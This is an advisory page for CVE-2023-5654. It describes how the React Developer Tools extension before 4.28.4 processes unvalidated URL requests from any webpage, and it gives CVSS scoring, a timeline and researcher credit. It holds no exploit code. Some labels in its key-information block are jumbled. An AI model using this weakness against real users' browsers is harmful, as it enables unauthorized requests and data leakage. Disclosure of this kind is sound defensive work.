Message Handling Vulnerability in React Developer Tools Extension by Meta
CVE-2023-5654

6.5MEDIUM

Key Information:

Vendor: Meta
Status: React Developer Tools Extension
Vendor: CVE Published:; 19 October 2023

What is CVE-2023-5654?

The React Developer Tools extension contains a vulnerability due to improper handling of messages received from webpage contexts. An active message listener allows any webpage to send requests that the extension processes without validating or sanitizing incoming URLs. This vulnerability enables a malicious webpage to exploit the user's browser and manipulate requests to arbitrary URLs, potentially leading to unauthorized access or data leakage.

Affected Version(s)

React Developer Tools Extension < 4.28.4

References

https://gist.github.com/CalumHutton/1fb89b64409570a43f89d...

CVSS V3.1

Score:

6.5

Severity:

MEDIUM

Confidentiality:

None

Integrity:

Low

Availability:

None

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

None

User Interaction:

None

Scope:

Unchanged

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Oct 19, 2023
Vulnerability Reserved
Oct 19, 2023

Credit

Calum Hutton, Snyk